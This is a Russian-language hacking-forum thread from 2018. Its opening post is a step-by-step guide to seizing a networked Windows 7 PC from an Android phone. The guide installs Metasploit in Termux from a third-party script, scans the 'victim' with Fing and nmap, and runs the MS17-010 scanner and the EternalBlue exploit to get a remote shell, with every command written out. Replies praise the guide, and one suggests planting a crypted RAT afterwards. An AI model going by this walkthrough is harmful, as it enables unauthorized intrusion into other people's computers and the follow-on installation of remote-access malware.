Загрузка...

Easy hacking of a computer from an android.

Thread in Kali Linux created by sotru May 11, 2018. 8975 views

  1. sotru
    sotru Topic starter May 11, 2018 мы многих ограбили, чтобы попить чая с ништяками 435 Nov 24, 2017
    Всё что нам для этого понадобится:

    • Прямые руки
    • Телефон на андроиде
    • Fing
    • nmap
    • temux и metasploit или kali nethunter
    1)
    Для начала скачаем termux из google play
    Теперь установим metasploit:

    Код:
    apt update
    Код:
    apt upgrade
    Код:
    apt install curl
    Код:
    curl -LO https://raw.githubusercontent.com/1Tech-X/Metasploit-/master/metasploit.sh
    Код:
    cd metasploit-framework-4.14.28
    Код:
    ./msfconsole
    Знаю загрузка довольно долгая но нужно потерпеть сожми яйца в кулак и жди

    После всего у нас должен открыться metasploit

    [IMG]

    осле того как вы установили metasploit можете считать что вы Zупер хакер и спокойно идти грабить банк или на урок информатики к Марине Сергеевне.

    2)
    Сканирование сети c Fing
    Теперь посмотрим кто есть в нашей сети:
    Для этого удобно использовать утилиту Fing
    Вот так выглядит моя локальная сеть(у всех по разному):

    [IMG]

    И если у вас зрение не минус 40 то можно легко увидеть "USER-ПК"(у всех всё по разному) он и будет нашей жертвой.Выбираем и запоминаем ip нашей жертвы,в моём случае это 192.168.1.104 и сканим его на порты.

    3)
    Сканирование на открытые порты c nmap
    Установим этот чудесный инструмент:
    Код:
    apt-get update
    Код:
    apt-get install nmap
    ip нашей жертвы,в моём случае это 192.168.1.104, сканим его на порты
    Код:
    nmap ip жертвы
    В моём случае это:
    nmap 192.168.1.104
    Есть бесконечное множество настроек nmap но в данный момент подойдёт эта(из за скорости)
    Вот что мы видим:

    [IMG]

    У меня стоит на машине 7 винда и у неё открыт 445 порт,любому более менее шарящему в metasploit человеку сразу понятно что первым делом мы будем юзать эксплоит eternalblue.

    4)
    Проверка уязвимости
    Дальше пойдут скрины с консоли kali nethunter так что не пугайтесь,все команды идентичны с командами в termux.(Мне так просто реально удобнее)
    Для начала мы протестим на сканере возьмёт ли наш эксплоит нашу жертву
    в metasploit вводите:
    Код:
    use auxiliary/scanner/smb/smb_ms17_010
    Здесь нам нужно указать только ip адрес жертвы
    Код:
    Выглядит это так:
    set RHOSTS ip жертвы
    В моём случае это:
    set RHOSTS 192.168.1.104
    Запускаем **** командой
    Код:
    run

    [IMG]

    Если мы видим что-то подобное значит хост уязвим к эксплоиту

    5)
    Теперь завершающая стадия:использование эксплоита
    В том же metasploit пишем
    Код:
    use exploit/windows/smb/ms17_010_eternalblue
    Здесь нам нужно указать ip жертвы и процесс
    Ip жертвы:
    Код:
    Выглядит это так:
    set RHOST ip жертвы
    В моём случае это:
    set RHOST 192.168.1.104
    И процесс
    Код:
    set ProcessName explorer.exe

    [IMG]

    И после того как вы помолились и поставили икону на обои можно запускать эксплоит
    Код:
    exploit
    Если всё удачно то тогда мы получим полный доступ к командной строке атакуемого компухтера.

    [IMG]

    [IMG]

    [IMG]

    Всем спасибо за внимание!
     
  2. Methane
    Methane May 11, 2018 Banned 581 Jan 18, 2018
    Годно
     
  3. Senfine
    Senfine May 11, 2018 Banned 148 Jul 30, 2016
    Есть чо для iOS? Я знаю что metasploid есть для iOS, но он сука через терминал у меня криво ставится и в итоге не запускается(
     
  4. EVILOFF
    EVILOFF May 11, 2018 /// 282 Oct 17, 2017
    Думал очередной гайд для тру хацкеров , а тут все понятно объяснили , можно будет найти применение на практике :thinking:
     
  5. heroverin
    heroverin May 11, 2018 *autistic screaming* 47 Dec 16, 2017
    Последним временем замечаю, что норм хацкеры с xiaomi дело имеют. А за статью - молодец.
     
  6. Dooda
    Dooda May 11, 2018 31 May 13, 2017
    Пожалуй самая годная и разжеванная статья про термукс)
     
  7. medardio
    medardio May 12, 2018 Banned 57 Nov 29, 2016
    cd metasploit-framework пишет no such file or directory
     
  8. medardio
    medardio May 13, 2018 Banned 57 Nov 29, 2016
    все,понял,теперь аж стыдно
     
  9. Andrey1206
    Andrey1206 May 13, 2018 Banned 12 May 12, 2018
    Годнота
     
  10. DimkaBear
    DimkaBear May 13, 2018 26 Feb 7, 2018
    А потом за решётку :prison:
     
  11. 13Snickersik37
    13Snickersik37 May 13, 2018 Banned 252 Apr 29, 2017
    Годно, симпу влепил
     
  12. Киберполиция
    А в чем причина? Я чет не понял:thinking:
     
  13. rscx
    rscx May 13, 2018 2136 Feb 17, 2018
    /del
    Уже тысячная тема по этому говну
     
  14. 13Snickersik37
    13Snickersik37 May 13, 2018 Banned 252 Apr 29, 2017
    Симпу убрал)
     
  15. sotru
    sotru Topic starter May 13, 2018 мы многих ограбили, чтобы попить чая с ништяками 435 Nov 24, 2017
    И что ? Может у кого-то какой-то способ не работает, выкладываю ещё 1. В точь-точь такой темы нету чё ты доебался.
     
  16. rscx
    rscx May 13, 2018 2136 Feb 17, 2018
    ору
    /del
     
  17. Dooda
    Dooda May 13, 2018 31 May 13, 2017
    Это консоль,и тут стрима не подрубить,можно по идее сделать скрин с вебки,либо же просто уже имея доступ к компу,закинуть туда криптованный ратник и иметь уже нормальный доступ ко всему. Но все это конечно надо суметь провернуть))
     
  18. renameduser_95321
    renameduser_95321 May 13, 2018 Banned 184 Mar 19, 2017
    Код:
    cd metasploit-framework-4.14.28

    Не может найти директорию или файл после прописания команды
     
  19. Sfoxx
    Sfoxx May 15, 2018 0 Apr 18, 2018
    годно, автор - круасанчик
     
  20. imbalance_inactive
    imbalance_inactive May 15, 2018 Banned 0 May 9, 2018
    Так-же
     
Loading...
Top